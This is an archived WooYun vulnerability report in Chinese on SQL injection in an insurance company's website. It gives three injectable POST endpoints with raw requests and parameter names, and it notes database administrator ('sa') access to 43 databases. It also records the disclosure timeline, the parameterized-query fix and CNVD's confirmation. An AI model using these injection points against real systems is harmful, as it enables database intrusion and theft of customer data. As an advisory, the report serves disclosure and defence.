乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-05: 细节已通知厂商并且等待厂商处理中 2015-12-09: 厂商已经确认,细节仅向厂商公开 2015-12-19: 细节向核心白帽子及相关领域专家公开 2015-12-29: 细节向普通白帽子公开 2016-01-08: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
sql注入打包
http://**.**.**.**/whoarewe_mapfre.html
注入点1#
POST /insure_ot_order_form.aspx HTTP/1.1Content-Length: 77Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/Cookie: .ASPXANONYMOUS=nwUxxjFk0QEkAAAAMWFhYjkzMmQtOTY2ZS00ZTgxLTlmMjItODE0NTJkMmQ0MTMyuQtdY7iBso4duHETSvyPY6UEyIg1; homevalidatecode=2195Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*key=CJType&otype=getenumitems
sa权限43个库
sql-2#这个点注入的参数有点多-p "selCJType,selRelation,selSIDType,selTIDType"
POST /insure_ot_order_confirm.aspx HTTP/1.1Content-Length: 949Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/Cookie: .ASPXANONYMOUS=nwUxxjFk0QEkAAAAMWFhYjkzMmQtOTY2ZS00ZTgxLTlmMjItODE0NTJkMmQ0MTMyuQtdY7iBso4duHETSvyPY6UEyIg1; homevalidatecode=2195Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*rdoInsured_1=1&rdoInvoice=0&rdoNeedEsPDF=0&rdoSex=0&rdoTSex=0&selCJType=1&selIDType=1&selProductItems=1&selProductList=c8a4b0a9-2be8-41c0-970a-6b0fac5cba89&selRelation=1&selSIDType=1&selTIDType=z41EvVoN&txtBirtyday=17&txtBnforder=1&txtBnfPortion=1&txtCustomerId=&txtDestCountryCode=&txtDestCountryName=dqnbnjvh&txtEmail=sample%40email.tst&txtEName=dqnbnjvh&txtEndTime=1&txtESName=dqnbnjvh&txtETName=dqnbnjvh&txtGetStartDate=01/01/1967&txtIDNo=1&txtIDType=&txtInvoiceAddress=3137%20Laguna%20Street&txtInvoiceFee=0.00&txtInvoicePhone=555-666-0606&txtInvoiceRecipient=1&txtInvoiceTitle=Mr.&txtLastRowIndex=1&txtName=dqnbnjvh&txtOtype=submit&txtPassCountry=g00dPa%24%24w0rD&txtPassCountryCode=&txtPassword=g00dPa%24%24w0rD&txtPasswordTwo=g00dPa%24%24w0rD&txtPhone=555-666-0606&txtPrice=1&txtProductItemId=&txtProductItemName=&txtProductName=&txtSIDNo=1&txtSName=dqnbnjvh&txtTBirtyday=17&txtTIDNo=1&txtTName=dqnbnjvh
sql-3#
POST /search.aspx HTTP/1.1Content-Length: 58Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/Cookie: .ASPXANONYMOUS=nwUxxjFk0QEkAAAAMWFhYjkzMmQtOTY2ZS00ZTgxLTlmMjItODE0NTJkMmQ0MTMyuQtdY7iBso4duHETSvyPY6UEyIg1; homevalidatecode=2195Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*searchtext=jEw85wr2
参数化查询
危害等级:高
漏洞Rank:10
确认时间:2015-12-09 17:37
CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无